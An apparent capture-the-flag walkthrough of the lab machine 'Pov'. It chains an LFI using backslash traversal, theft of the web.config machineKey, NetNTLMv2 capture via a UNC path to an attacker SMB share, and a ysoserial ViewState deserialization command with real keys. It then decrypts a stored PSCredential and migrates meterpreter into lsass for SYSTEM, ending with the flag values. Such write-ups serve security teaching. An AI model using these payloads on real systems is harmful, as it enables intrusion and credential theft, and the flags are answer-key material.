Nmap Results
# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 13.98 ms 10.10.14.1
2 14.12 ms 10.10.11.251
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 seconds
Service Enumeration
TCP/80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
We can see that the default page on the target web server has a title of pov.htb. Let's add that to our /etc/hosts file.
echo '10.10.11.251 pov.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100
/Index.html (Status: 200) [Size: 12330]
/css (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html (Status: 200) [Size: 12330]
/js (Status: 301) [Size: 141] [--> http://pov.htb/js/]
Virtual Hosts
# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]
dev.pov.htb
On the contact.aspx page there is a form that makes an HTTP POST request back to the same page. Not sure yet whether this is exploitable.
More Directory and File Enumeration
# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404
/Contact.aspx (Status: 200) [Size: 4691]
/Default.aspx (Status: 200) [Size: 21371]
/assets (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx (Status: 200) [Size: 4691]
/default.aspx (Status: 200) [Size: 21371]
If we try and navigate to http://dev.pov.htb/portfolio/assets, you can see that the web server redirects us to http://dev.pov.htb:8080.
Testing the Download Function
Clicking the Download CV button invokes a __doPostBack JavaScript call with the event target download, and uses the file name cv.pdf by default.
I got really lucky with my guess that the cv.pdf file is stored at the root of the directory. The Download CV button is just pulling the cv.pdf file from this directory. Looking at my Burp request history, I notice there are other files we can test with in the /portfolio/ directory. It should be possible to download files by simply modifying the file= parameter in the POST request. Let's see if we can download any of the above files from the server. The procedure will go like this:
- Turn on Burp intercept
- Click the Download CV button
- Change the cv.pdf filename to default.aspx
- Check and see if we got the page source code
Additional Download Tests
This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater.
In the source code we downloaded above, we noted the CodeFile="index.aspx.cs" attribute in the @Page directive, which names the code-behind file where the default.aspx page runs its server-side code. Let's take a look at that file. In Repeater, change &file=default.aspx to &file=index.aspx.cs and click Send.
Nice! We are able to read the C# code that runs server side when we load the page initially or interact with the Download event listener. There appears to be a bit of user input sanitization on the file= parameter as well, but it wasn't a problem for us: it apparently only deals with forward-slash traversal, and Windows accepts backslashes as path separators, so ..\ walks up the tree untouched.
Let's take a look at contact.aspx and do the same thing. Load the page source, then load the server-side source.
Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.
Absolute paths also worked flawlessly without needing to do any special tricks: &file=C:\Windows\System32\drivers\etc\hosts.
Relative paths work as well; this is how I found the config file for the dev.pov.htb host: &file=..\web.config. That file is where the application's <machineKey> lives, which is what makes the ViewState attack later on possible.
I even found that I can capture the sfitz user's NetNTLMv2 hash by running impacket-smbserver on Kali and specifying &file=\\kali_vpn_ip\share_name\file_name: when the handler opens a UNC path, the IIS worker process authenticates to our SMB server with its own identity.
I also tried creating reverse .aspx and web.config shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name, even with other TCP ports specified.
Exploit
VIEWSTATE Deserialization with Secrets
I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:
- Response.TransmitFile() exploitability
- Response.AppendHeader() exploitability
However, it was the search that led to the HackTricks page on ViewState deserialization that ultimately opened the door to code execution.
The HackTricks page advises using the ysoserial.net ysoserial.exe binary to generate a serialized __VIEWSTATE payload that the server will deserialize. In this case we know the machineKey secrets, because we read web.config through the LFI: a ViewState we build ourselves can be signed with the real validationKey and encrypted with the real decryptionKey, so the server's MAC check passes and the gadget chain runs.
Run the ysoserial tool on a Windows VM, your Windows host, or under Wine on Kali. I'm going to do it the Wine way, cause I like pain.
Installing Wine Dependencies
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-complete
Installing Wine-Mono
First, check the installed version of wine by running wine --version. In the screenshot below, you'll see I have version 8.0.1.
Next, consult the wine-mono version table here:
I am not at version 8.9, but my version is greater than 7.20, therefore we should install wine-mono version 7.4.0.
wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstaller
Use the Install... button in the uninstaller window to install the downloaded MSI. If wine uninstaller fails with wine: could not load kernel32.dll, status c0000135, just run rm -rf ~/.wine/ to reset the prefix, then re-run wine uninstaller.
Install .NET Libraries
winetricks dotnet48
Generating the Serialized Payload
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/Release
We'll be referencing the example command here to generate the payload. The --path and --apppath values must match the page you will post the ViewState to (here /portfolio/default.aspx under the application root /): on .NET 4.5 and later they feed into the MAC key derivation, so a mismatch produces a ViewState MAC validation error on the server instead of code execution. The -c command (ping 10.10.14.15) is a harmless first test that we can confirm with tcpdump.
# LD_PRELOAD= : clear the runtime environment variable to silence some errors on my host
# 2>/dev/null : wine writes its own diagnostics to stderr, which would otherwise get mixed into the payload
# tr -d '\n' : join on line breaks, in case wine wraps the output (sed 's/\n//g' is a no-op here, because sed strips the newline before matching each line)
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | tr -d '\n'
Weaponizing the Payload
Go into your Burp proxy settings and turn Intercept on.
Click the Download CV button.
Note the request is intercepted and held by Burp. Highlight the value of the __VIEWSTATE parameter, from just after the = all the way up to the next & (ampersand), and overwrite it with the payload you generated. Because the body is application/x-www-form-urlencoded, the base64 characters +, / and = must be URL-encoded (in Burp, select the pasted value and use URL-encode key characters, Ctrl+U), otherwise the server decodes + as a space and the ViewState no longer parses. Recall that the command I used in the example is ping 10.10.14.15, so I'm going to attempt to have the target ping my Kali VPN IP.
Go back into Burp and press the Forward button.
Note that I used tcpdump to listen for ICMP traffic on my tun0 interface, and you can see the incoming ICMP echo request packets from 10.10.11.251 (the target's IP address).
Getting a Reverse Shell
Transfer nc.exe to the Target
Trigger a Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: POV
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA076
Original Install Date: 10/26/2023, 1:01:55 PM
System Boot Time: 2/2/2024, 6:46:50 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use: 770 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.251
[02]: fe80::4666:410:2b2c:7069
[03]: dead:beef::4d88:e9c:6f0c:4b61
[04]: dead:beef::a9
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\POV
-------------------------------------------------------------------------------
Administrator alaading DefaultAccount
Guest sfitz WDAGUtilityAccount
The command completed successfully.
Local Groups
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a9
IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
IPv4 Address. . . . . . . . . . . : 10.10.11.251
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
10.10.10.2
Open Ports
localaddress localport
------------ ---------
:: 49668
:: 49667
:: 49666
:: 49665
:: 49664
:: 47001
:: 5985
:: 445
:: 135
:: 80
0.0.0.0 49668
0.0.0.0 49667
0.0.0.0 49666
0.0.0.0 49665
0.0.0.0 49664
10.10.11.251 139
0.0.0.0 135
Interesting Files
C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">...</SS>
</Props>
</Obj>
</Objs>
Privilege Escalation
Lateral to Alaading
In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml file, which when inspected is a PowerShell PSCredential object stored in CliXml format (the output of Export-Clixml).
I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease. This works because Export-Clixml protects the password with DPAPI under the exporting user's key, so it can only be decrypted by the same user on the same machine, and we are running as sfitz, who created the file.
# Import-Clixml transparently DPAPI-decrypts the SecureString; this only succeeds as the user who exported it (sfitz here)
$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
You may also have noticed in the post-exploit enumeration that tcp/5985 (WinRM) is listening. It is definitely behind the Windows firewall, as it wasn't exposed in our initial nmap scan. We can use chisel to forward this port back to Kali and then try the alaading credentials over WinRM.
Once logged in as alaading, we repeat the post-exploit enumeration process.
Alternative Lateral to Alaading
- Transfer RunasCs.exe to the target
- Start a TCP listener
- Run the command to connect to the TCP listener with alaading credentials
Escalate to Administrator
I tried to use the SeDebugPrivilege given to this user account to achieve NT AUTHORITY\SYSTEM or Administrator without meterpreter. I was able to dump lsass using procdump, but the Administrator didn't have a cached session (lsass only holds credential material for accounts that have logged on), so there was nothing to extract. Other techniques were also fruitless.
Metasploit
meterpreter > migrate -N lsass.exe
With SeDebugPrivilege, meterpreter can open lsass.exe (which runs as SYSTEM) and inject into it; once the session has migrated, it runs as NT AUTHORITY\SYSTEM.
Flags
User
6554d872ca302f4e5c7c31ac06f8f638
Root
8f5b63e0cff832f141a776127bb09758